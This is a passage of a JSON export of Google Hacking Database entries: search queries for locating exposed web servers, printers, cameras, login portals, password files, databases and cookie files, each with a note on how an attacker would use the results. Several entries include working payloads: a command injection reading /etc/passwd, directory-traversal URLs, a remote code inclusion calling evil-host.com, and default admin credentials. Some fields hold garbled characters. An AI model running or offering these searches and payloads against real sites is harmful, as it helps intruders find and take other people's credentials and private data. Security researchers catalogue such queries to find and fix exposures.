}, { "signatureReferenceNumber": "355", "link": "https://www.exploit-db.com/ghdb/355/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22OmniHTTPd%2F2.10%22+intitle%3Aindex.of&btnG=Search", "shortDescription": "\"OmniHTTPd/2.10\" intitle:index.of", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "356", "link": "https://www.exploit-db.com/ghdb/356/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22OpenSA%2F1.0.4%22+intitle%3Aindex.of&btnG=Search", "shortDescription": "\"OpenSA/1.0.4\" intitle:index.of", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "357", "link": "https://www.exploit-db.com/ghdb/357/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Red+Hat+Secure%2F2.0%22&btnG=Search", "shortDescription": "\"Red Hat Secure/2.0\"", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "358", "link": "https://www.exploit-db.com/ghdb/358/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Red+Hat+Secure%2F3.0+server+at%22&btnG=Search", "shortDescription": "\"Red Hat Secure/3.0 server at\"", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "359", "link": "https://www.exploit-db.com/ghdb/359/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=SEDWebserver+*+server+%2Bat+intitle%3Aindex.of&btnG=Search", "shortDescription": "sEDWebserver * server +at intitle:index.of", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "360", "link": "https://www.exploit-db.com/ghdb/360/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=fitweb-wwws+*+server+at+intitle%3Aindex.of&btnG=Search", "shortDescription": "fitweb-wwws * server at intitle:index.of", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "361", "link": "https://www.exploit-db.com/ghdb/361/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22httpd%2Bssl%2Fkttd%22+*+server+at+intitle%3Aindex.of&btnG=Search", "shortDescription": "\"httpd+ssl/kttd\" * server at intitle:index.of", "textualDescription": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision." }, { "signatureReferenceNumber": "362", "link": "https://www.exploit-db.com/ghdb/362/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Phaser+6250%22+%22Printer+Neighborhood%22+%22XEROX+CORPORATION%22&btnG=Search", "shortDescription": "Xerox Phaser 6250", "textualDescription": "Base Specifications Phaser 6250N: Letter/Legal Size Color Printer 110V, 26ppm Color/B&W (24ppm A4 Color/B&W), 2400dpi, 700MHz Processor, Ethernet, 256MB Memory, Photo Quality Mode, Network Feature SetPassword not allways needed it seems, depends on admin setup.." }, { "signatureReferenceNumber": "363", "link": "https://www.exploit-db.com/ghdb/363/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Phaser%C2%AE+740+Color+Printer%22+%22printer+named%3A+%22&btnG=Search", "shortDescription": "Xerox Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 740 Color Printer", "textualDescription": "This product is supported but no longer sold by Xerox in the United States. Replacement Product: Phaser\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6250.Configuration pages are password protected." }, { "signatureReferenceNumber": "364", "link": "https://www.exploit-db.com/ghdb/364/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22Phaser+8200%22+%22%C2%A9+Xerox%22+%22refresh%22+%22+Email+Alerts%22&filter=0", "shortDescription": "Xerox Phaser 8200", "textualDescription": "Brochure info: \"The Phaser 8200 uses solid ink, an alternative technology to laser printing. Unlike typical laser printers, solid ink doesn't require throwaway cartridges to get ink in the printer.\" Using the Internet, your printer can send performance information to our computers. PhaserSMART, our diagnostic system, examines the information, diagnoses the issue, and immediately walks you through a proposed solution. Automatic alerts minimize printer management problems. Alerts notify you via email when it's time to replace supplies, or when service is required.\"Moderator note: you may not be able to connect to the links Google gives if the printers are turned off when not in use." }, { "signatureReferenceNumber": "365", "link": "https://www.exploit-db.com/ghdb/365/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22Phaser%C2%AE+840+Color+Printer%22+%22Current+Status%22+%22printer+named:%22", "shortDescription": "Xerox Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 840 Color Printer", "textualDescription": "This product is supported but no longer sold by Xerox in the United States. Support and supplies for this product continue to be available online. Replacement Product: Phaser\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 8400This search finds the PhaserLinkTM Printer Management Software for the Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 840 Color Printer. It seems at least the \"Print DEMO\" page works without authentication." }, { "signatureReferenceNumber": "366", "link": "https://www.exploit-db.com/ghdb/366/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22index+of%22+%2F+picasa.ini+&btnG=Google+Search", "shortDescription": "\"index of\" / picasa.ini", "textualDescription": "Picasa is an 'Automated Digital Photo Organizer' recently aquired by Google. This search allows the voyer to browse directories of photos uploaded using the picasa software." }, { "signatureReferenceNumber": "367", "link": "https://www.exploit-db.com/ghdb/367/", "category": "Footholds", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22adding+new+user%22+inurl%3Aaddnewuser+-%22there+are+no+domains%22&btnG=Search", "shortDescription": "\"adding new user\" inurl:addnewuser -\"there are no domains\"", "textualDescription": "Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail)." }, { "signatureReferenceNumber": "368", "link": "https://www.exploit-db.com/ghdb/368/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&&q=intitle%3A%22index+of%22+%2Bmyd+%2Bsize&btnG=Search", "shortDescription": "intitle:\"index of\" +myd size", "textualDescription": "The MySQL data directory uses subdirectories for each database and common files for table storage. These files have extensions like: .myd, .myi or .frm. An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database." }, { "signatureReferenceNumber": "369", "link": "https://www.exploit-db.com/ghdb/369/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Acnf+my.cnf+-cvs+-example&btnG=Search", "shortDescription": "filetype:cnf my.cnf -cvs -example", "textualDescription": "The MySQL database system uses my.cnf files for configuration. It can include a lot of information, ranging from pathes, databasenames up to passwords and usernames.Beware this search still gives false positives (examples, templates)." }, { "signatureReferenceNumber": "370", "link": "https://www.exploit-db.com/ghdb/370/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=hAcxFtpScan&btnG=Google+Search", "shortDescription": "(\"Indexed.By\"|\"Monitored.By\") hAcxFtpScan", "textualDescription": "hAcxFtpScan - software that use 'l33t h@x0rz' to monitor their file stroz on ftp. On the ftp server usualy it is a directory like:/Monitored.By.hAcxFtpScan//Indexed.By.hAcxFtpScan/These are tagged, hacked, rooted and filled servers, in wich pplz from forums or irc channels (in most cases, usuasly private) share filez (yes yes p2p suxz)And again thnxz goo 4 help us to find it." }, { "signatureReferenceNumber": "371", "link": "https://www.exploit-db.com/ghdb/371/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aemail+filetype%3Amdb&btnG=Search", "shortDescription": "inurl:email filetype:mdb", "textualDescription": "Microsoft Access databases containing email information.." }, { "signatureReferenceNumber": "372", "link": "https://www.exploit-db.com/ghdb/372/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%2B%22Powered+by+INDEXU%22+inurl%3A%28browse%7Ctop_rated%7Cpower_search%7Chot%7Cbrowse%7Ccreate_admin_user%29+filetype%3Aphp&btnG=Sea", "shortDescription": "Powered by INDEXU", "textualDescription": "From the sales department: \"INDEXU is a portal solution software that allows you to build powerful Web Indexing Sites such as yahoo.com, google.com, and dmoz.org with ease. It's ability to allow you and your members to easily add, organize, and manage your links makes INDEXU the first choice of all webmasters.\"(Moderator note: don't believe the marketing talk..)Some of these servers are not protected well enough. It has been reported that on (rare) occosions this page ->http://[indexu server]/recovery_tools/create_admin_user.phpindicates admin login is possible by the appearance of three text lines:Create Administrator LoginDelete old administrator user ....okCreate new administrator user ....okAn attacker can then change the URL tohttp://[target]/admin/index.php and enter:user=adminpass=adminBut that's if you find them.." }, { "signatureReferenceNumber": "373", "link": "https://www.exploit-db.com/ghdb/373/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=data+filetype%3Amdb+-site%3Agov+-site%3Amil&btnG=Search", "shortDescription": "data filetype:mdb -site:gov -site:mil", "textualDescription": "Microsoft Access databases containing all kinds of 'data'." }, { "signatureReferenceNumber": "374", "link": "https://www.exploit-db.com/ghdb/374/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Abackup+filetype%3Amdb&btnG=Search", "shortDescription": "inurl:backup filetype:mdb", "textualDescription": "Microsoft Access database backups.." }, { "signatureReferenceNumber": "375", "link": "https://www.exploit-db.com/ghdb/375/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aforum+filetype%3Amdb&btnG=Search", "shortDescription": "inurl:forum filetype:mdb", "textualDescription": "Microsoft Access databases containing 'forum' information .." }, { "signatureReferenceNumber": "376", "link": "https://www.exploit-db.com/ghdb/376/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+Of%22+cookies.txt+%22size%22&btnG=Search", "shortDescription": "intitle:\"Index Of\" cookies.txt size", "textualDescription": "searches for cookies.txt file. On MANY servers this file holds all cookie information, which may include usernames, passwords, but also gives an attacker some juicy information on this users surfing habits." }, { "signatureReferenceNumber": "377", "link": "https://www.exploit-db.com/ghdb/377/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:(password+%7C+passcode)+intext:(username+%7C+userid+%7C+user)+++filetype:csv&hl=en&lr=&ie=UTF-8&start=0&sa=N", "shortDescription": "intext:(password | passcode) intext:(username | userid | user) filetype:csv", "textualDescription": "CSV formatted files containing all sorts of user/password combinations. Results may vary, but are still interesting to the casual attacker.." }, { "signatureReferenceNumber": "378", "link": "https://www.exploit-db.com/ghdb/378/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aprofiles+filetype%3Amdb&btnG=Search", "shortDescription": "inurl:profiles filetype:mdb", "textualDescription": "Microsoft Access databases containing (user) profiles .." }, { "signatureReferenceNumber": "379", "link": "https://www.exploit-db.com/ghdb/379/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Acgi+inurl%3A%22Web_Store.cgi%22&btnG=Google+Search", "shortDescription": "filetype:cgi inurl:\"Web_Store.cgi\"", "textualDescription": "Zero X reported that \"Web_Store.cgi\" allows Command Execution:This application was written by Selena Sol and Gunther Birznieks. You can execute shellcommands:http://[www.victim.com]/cgi-bin/web_store.cgi?page=.html|cat/etc/passwd|It is not know which version and has not (yet) been confirmed by the googledork forum members. That makes this search of limited use, but to an attacker it may be used as a starting point." }, { "signatureReferenceNumber": "380", "link": "https://www.exploit-db.com/ghdb/380/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=ASP.login_aspx+%22ASP.NET_SessionId%22&btnG=Search", "shortDescription": "ASP.login_aspx \"ASP.NET_SessionId\"", "textualDescription": ".NET based login pages serving the whole environment and process trace for your viewing pleasure.. These are often found on test servers, just before going online to the general public I guess. If the current page has no debugging information any longer, an attacker could still look at Google's cached version." }, { "signatureReferenceNumber": "381", "link": "https://www.exploit-db.com/ghdb/381/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22ASP.NET_SessionId%22+%22data+source%3D%22&btnG=Search", "shortDescription": "\"ASP.NET_SessionId\" \"data source=\"", "textualDescription": ".NET pages revealing their datasource and sometimes the authentication credentials with it. The complete debug line looks something like this for example:strConn\tSystem.String Provider=sqloledb;Network Library=DBMSSOCN;Data Source=ch-sql-91;Initial Catalog=DBLive;User Id=login-orsearch;Password=0aX(v5~di)>S$+*For quick fun an attacker could modify this search to find those who use Microsoft Access as their storage: It will not suprise the experienced security digger that these files are often in a downloadeble location on the server." }, { "signatureReferenceNumber": "382", "link": "https://www.exploit-db.com/ghdb/382/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Novell%2C+Inc%22+WEBACCESS+Username+Password+%22Version+*.*%22+Copyright++-inurl%3Ahelp+-guides%7Cguide&btnG=Search", "shortDescription": "\"Novell, Inc\" WEBACCESS Username Password \"Version *.*\" Copyright -inurl:help -guides|guide", "textualDescription": "This may be used to find Novell Grouwise Webaccess servers." }, { "signatureReferenceNumber": "383", "link": "https://www.exploit-db.com/ghdb/383/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext%3Apwd+inurl%3A%28service+%7C+authors+%7C+administrators+%7C+users%29+%22%23+-FrontPage-%22", "shortDescription": "\"# -FrontPage-\" ext:pwd inurl:(service | authors | administrators | users) \"# -FrontPage-\" inurl:service.pwd", "textualDescription": "Frontpage.. very nice clean search results listing !!No further comments required..changelog:22 jan 2005: improved by vs1400 !" }, { "signatureReferenceNumber": "384", "link": "https://www.exploit-db.com/ghdb/384/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Acgi+inurl%3A%22fileman.cgi%22&btnG=Search", "shortDescription": "filetype:cgi inurl:\"fileman.cgi\"", "textualDescription": "This brings up alot of insecure as well as secure filemanagers. These software solutions are often used by companies offering a \"simple\" but \"cost effective\" way to their users who don't know unix or html. There is a problem sometimes with this specific filemanager due to insecure use of the session ID that can be found in the unprotected \"fileman.log\" logfile. It has been reported that an attacker can abuse the last document-edit-url of the logfile. By copy pasting that line in a new window it gives the attacker valid user credentials on the server, at least for a while.. (think hours not seconds)." }, { "signatureReferenceNumber": "385", "link": "https://www.exploit-db.com/ghdb/385/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22Index+Of%22+-inurl%3Amaillog++maillog+size", "shortDescription": "intitle:\"Index Of\" -inurl:maillog maillog size", "textualDescription": "This google search reveals all maillog files within various directories on a webserver. This search brings back 872 results to-date, all of which contain various chunks of information (ie. Usernames, email adresses, Login/Logout times of users, IPAdresses, directories on the server ect. ect.)Someone, with this information could dig up info on the server before trying to penetrate it by finding usernames, and email adresses of accounts on the server." }, { "signatureReferenceNumber": "386", "link": "https://www.exploit-db.com/ghdb/386/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3Aliveapplet+inurl%3ALvAppl", "shortDescription": "Canon Webview netcams", "textualDescription": "Canon has a series of netcams that all use the \"WebView LiveScope\" software. They are frequently used by japanese sites. Unfortunately most are crawled by their IP address so determining their location becomes more difficult. Some model names are:* VB-C10* VB-101* VB-C50iThis search looks for the java applet called \"LiveApplet\" that is used by Canon's network camera feeds. There is also a standalone (free) program, that is easier to control and lets you save bookmarks. It's available for PC and MACs. The win32 download is here: http://www.x-zone.canon.co.jp/cgi-bin/nph-wvh35-cs.cgi" }, { "signatureReferenceNumber": "387", "link": "https://www.exploit-db.com/ghdb/387/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl%3A%22index.php%3Fmodule%3Dew_filemanager%22", "shortDescription": "inurl:\"index.php? module=ew_filemanager\"", "textualDescription": "http://www.cirt.net/advisories/ew_file_manager.shtml:Product: EasyWeb FileManager Module - http://home.postnuke.ru/index.phpDescription: EasyWeb FileManager Module for PostNuke is vulnerable to a directory traversal problem which allows retrieval of arbitrary files from the remote system. Systems Affected: EasyWeb FileManager 1.0 RC-1Technical Description: The PostNuke module works by loading a directory and/or file via the \"pathext\" (directory) and \"view\" (file) variables. Providing a relative path (from the document repository) in the \"pathext\" variable will cause FileManager to provide a directory listing of that diretory. Selecting a file in that listing, or putting a file name in the \"view\" variable, will cause EasyWeb to load the file specified. Only files and directories which can be read by the system user running PHP can be retrieved.Assuming PostNuke is installed at the root level:/etc directory listing:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/etc/passwd file:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwdFix/Workaround:Use another file manager module for PostNuke, as the authors do not appear to bemaintaining EW FileManager.Vendor Status: Vendor was contacted but did not respond.Credir: Sullo - cirt.netNOTE: mitigating factor, an attacker needs to be registred and logged on to have access rights to this module." }, { "signatureReferenceNumber": "388", "link": "https://www.exploit-db.com/ghdb/388/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=allinurl:%22index.php%22+%22site=sglinks%22&num=100&start=100", "shortDescription": "allinurl:\"index.php\" \"site=sglinks\"", "textualDescription": "Easyins Stadtportal v4 is a German Content Management System for cities and regions. Version 4 and prior seems to be vulnerable to a code inclusion in index.php. Bugtraq: http://www.securityfocus.com/bid/10795http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com" }, { "signatureReferenceNumber": "389", "link": "https://www.exploit-db.com/ghdb/389/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=%22powered+by%22+%22shoutstats%22+hourly+daily&num=100&filter=0", "shortDescription": "\"powered by\" \"shoutstats\" hourly daily", "textualDescription": "shoutstats is a fast, free Shoutcast server statistic analysis program. It produces instant and dynamic usage reports in HTML format, for viewing in a standard browser. Shoutstats is a bunch of php scripts and a RRDtool database. It has been written under a Debian GNU/Linux.http://www.glop.org/projects/shoutstatsThis search can be used to find Shoutcast servers." }, { "signatureReferenceNumber": "390", "link": "https://www.exploit-db.com/ghdb/390/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle%3A%22Shoutcast+Administrator%22", "shortDescription": "intitle:\"Shoutcast Administrator\"", "textualDescription": "shoutcast is software for streaming mp3 and such. This search finds the administrator page. It can be used to detect unlisted Shoutcast servers." }, { "signatureReferenceNumber": "391", "link": "https://www.exploit-db.com/ghdb/391/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3A%22utilities%2FTreeView.asp%22", "shortDescription": "inurl:\"utilities/TreeView.asp\"", "textualDescription": "From the marketing brochure: \"UltiPro Workforce Management offers you the most comprehensive and cost-effective HR and payroll solution on the market today.\"The default passwords are easy to guess if an employee has not logged into this system. An attacker would only need to find the loginname." }, { "signatureReferenceNumber": "392", "link": "https://www.exploit-db.com/ghdb/392/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&q=filetype%3Apwl+pwl", "shortDescription": "filetype:pwl pwl", "textualDescription": "These are Windows Password List files and have been known to be easy to crack since the release of Windows 95. An attacker can use the PWLTools to decode them and get the users passwords. The following example has been provided:---Resource table: 0292 0294 0296 0298 (..etc..)File: C:\\Downloads\\2004-07\\07-26\\USER1.PWLUser name: 'USER1'Password: ''Dial-up:'*Rna\\Internet\\PJIU_TAC'Password:'PJIUSCAC3000' ---" }, { "signatureReferenceNumber": "393", "link": "https://www.exploit-db.com/ghdb/393/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22apricot+-+admin%22+00h&btnG=Google+Search", "shortDescription": "\"apricot - admin\" 00h", "textualDescription": "This search shows the webserver access stats as the user \"admin\". The language used is Japanese and the search includes the \"00h\" value which is only shown when the admin is logged in." }, { "signatureReferenceNumber": "394", "link": "https://www.exploit-db.com/ghdb/394/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aora+ora&btnG=Search", "shortDescription": "filetype:ora ora", "textualDescription": "Greetings, The *.ora files are configuration files for oracle clients. An attacker can identify a oracle database this way and get more juicy information by searching for ora config files.This search can be modified to be more specific:- filetype:ora sqlnet - filetype:ora names" }, { "signatureReferenceNumber": "395", "link": "https://www.exploit-db.com/ghdb/395/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&q=filetype%3Awsdl+wsdl&btnG=Search", "shortDescription": "filetype:wsdl wsdl", "textualDescription": "The XML headers are called *.wsdl files.they can include data, functions or objects. An attacker with knowledge of XML coding can sometimes do evil things with this stuff." }, { "signatureReferenceNumber": "396", "link": "https://www.exploit-db.com/ghdb/396/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&q=filetype%3Ainc+inc+intext%3Asetcookie", "shortDescription": "filetype:inc inc intext:setcookie", "textualDescription": "Cookies are often used for authentication and a lot of other stuff.The \"inc\" php header files often include the exact syntax of the cookies. An attacker may create his own cookie with the information he has taken from the header file and start cookie poisining." }, { "signatureReferenceNumber": "397", "link": "https://www.exploit-db.com/ghdb/397/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&q=inurl%3A%2Fwwwboard", "shortDescription": "inurl:/wwwboard", "textualDescription": "The software wwwboard stores its passwords in a file called \"passwd.txt\".An attacker may try to search forinurl:/wwwboardthen add a \"passwd.txt\" to it (../wwwboard/passwd.txt) and decrypt des DES passwords." }, { "signatureReferenceNumber": "398", "link": "https://www.exploit-db.com/ghdb/398/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&q=%22allow_call_time_pass_reference%22+%22PATH_INFO%22", "shortDescription": "\"allow_call_time_pass_reference\" \"PATH_INFO\"", "textualDescription": "Returns publically visible pages generated by the php function phpinfo(). This search differs from other phpinfo() searches in that it doesn't depend on the filename being called \"phpinfo.php\". Some result files that include phpinfo are:" }, { "signatureReferenceNumber": "399", "link": "https://www.exploit-db.com/ghdb/399/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%2Adb+filetype%3Amdb+", "shortDescription": "inurl:*db filetype:mdb", "textualDescription": "More Microsoft Access databases for your viewing pleasure. Results may vary, but there have been passwords discovered with this search." }, { "signatureReferenceNumber": "400", "link": "https://www.exploit-db.com/ghdb/400/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Afp5+fp5+-site%3Agov+-site%3Amil+-%22cvs+log%22&btnG=Search", "shortDescription": "filetype:fp5 fp5 -site:gov -site:mil -\"cvs log\"", "textualDescription": "These are various kinds of FileMaker Pro Databases (*.fp5 applies to both version 5 and 6)." }, { "signatureReferenceNumber": "401", "link": "https://www.exploit-db.com/ghdb/401/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3AgotoURL.asp%3Furl%3D", "shortDescription": "inurl:gotoURL.asp?url=", "textualDescription": "ASP Nuke is an open-source software application for running a community-based web site on a web server. By open-source, we mean the code is freely available for others to read, modify and use in accordance with the software license. The requirements for the ASP Nuke content management system are: 1. Microsoft SQL Server 2000 and 2. Microsoft Internet Information Server (IIS) 5.0 (http://www.aspnuke.com/)On 30 Dec. 2003 the hackers Cobac and Alnitak discovered a bug in Asp Nuke (version 1.2, 1.3, and 1.4)Problem : the file addurl-inc.asp included in the file gotourl.asp does not sanitize the input vars and make SQL injection possible.For a examples check the original advisory posted to a spanish forum: http://66.102.11.104/search?q=cache:10-ze5DIJ-UJ:www.elhacker.net/foro/index.php%3Ftopic%3D11830.0%3Bprev_next%3Dprev%22&hl=en(link broken in two lines, glue them together first :-)An attacker can obtain the user and admin passwords by crafting a SQL statement." }, { "signatureReferenceNumber": "402", "link": "https://www.exploit-db.com/ghdb/402/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext%3Acentreware+inurl%3Astatus", "shortDescription": "Phasers 4500/6250/8200/8400", "textualDescription": "More Xerox printers (Phasers 4500/6250/8200/8400). An attacker can access the webinterface with this search." }, { "signatureReferenceNumber": "403", "link": "https://www.exploit-db.com/ghdb/403/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&q=filetype%3Afp3+fp3", "shortDescription": "filetype:fp3 fp3", "textualDescription": "These are FileMaker Pro version 3 Databases." }, { "signatureReferenceNumber": "404", "link": "https://www.exploit-db.com/ghdb/404/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&q=filetype%3Afp7+fp7", "shortDescription": "filetype:fp7 fp7", "textualDescription": "These are Filemaker Pro version 7 databases files." }, { "signatureReferenceNumber": "405", "link": "https://www.exploit-db.com/ghdb/405/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype%3Acfg+auto_inst.cfg", "shortDescription": "filetype:cfg auto_inst.cfg", "textualDescription": "Mandrake auto-install configuration files. These contain information about the installed packages, networking setttings and even user accounts." }, { "signatureReferenceNumber": "406", "link": "https://www.exploit-db.com/ghdb/406/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3ANode.List+Win32.Version.3.11", "shortDescription": "intitle:Node.List Win32.Version.3.11", "textualDescription": "synchronet Bulletin Board System Software is a free software package that can turn your personal computer into your own custom online service supporting multiple simultaneous users with hierarchical message and file areas, multi-user chat, and the ever-popular BBS door games.An attacker could use this search to find hosts with telnet access. In some cases the username may even be visible on the node list page, thus leaving only the password to guess." }, { "signatureReferenceNumber": "407", "link": "https://www.exploit-db.com/ghdb/407/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&q=%22powered+by+antiboard%22", "shortDescription": "\"powered by antiboard\"", "textualDescription": "\"AntiBoard is a small and compact multi-threaded bulletin board/message board system written in PHP. It uses either MySQL or PostgreSQL as the database backend, and has support for different languages. It is not meant as the end all be all of bulletin boards, but rather something to easily integrate into your own page.\"There is an excellent vulnerability report at:http://www.securiteam.com/unixfocus/5XP010ADPY.htmlVendor Status:The vendor has been informed of the issues on the 28th July 2004, however no fix is planned in the near future." }, { "signatureReferenceNumber": "408", "link": "https://www.exploit-db.com/ghdb/408/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&q=%28inurl%3A%22ars%2Fcgi-bin%2Farweb%3FO%3D0%22+%7C+inurl%3Aarweb.jsp%29+-site%3Aremedy.com+-site%3Amil", "shortDescription": "(inurl:\"ars/cgi-bin/arweb?O=0\" | inurl:arweb.jsp) -site:remedy.com -site:mil", "textualDescription": "From the vendor site: \"Remedy\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2s Action Request System\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae is for automating Service Management business processes. More than 7,000 customers know that AR System is the way to automate key business processes. AR System includes tools for application-to-application integration, including support for Web Services that requires no additional programming.\"Login is often 'guest' with no password. Or no login is required. An attacker can search the database for sensitive info (passwords), and search profiles to obtain usernames, emails." }, { "signatureReferenceNumber": "409", "link": "https://www.exploit-db.com/ghdb/409/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&&q=%22AutoCreate%3DTRUE+password%3D*%22", "shortDescription": "\"AutoCreate=TRUE password=*\"", "textualDescription": "This searches the password for \"Website Access Analyzer\", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/Note: google to find the results of this software." }, { "signatureReferenceNumber": "410", "link": "https://www.exploit-db.com/ghdb/410/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intext%3A%22d.aspx%3Fid%22+%7C%7C+inurl%3A%22d.aspx%3Fid%22", "shortDescription": "intext:\"d.aspx?id\" || inurl:\"d.aspx?id\"", "textualDescription": "\"The YouSendIt team was formed to tackle a common problem: secure transmission of large documents online without the use of clumsy client software, mail servers with limited storage space, and sharing passwords. By eliminating the size constraints and security risks of sending files by email, YouSendIt has turned the most common form of communication on the Internet into the best method of secure document transimssion.\"This search shows the files that were transmitted. A malicious user could download them from these pages. This company tends to hold the users responsible for content, 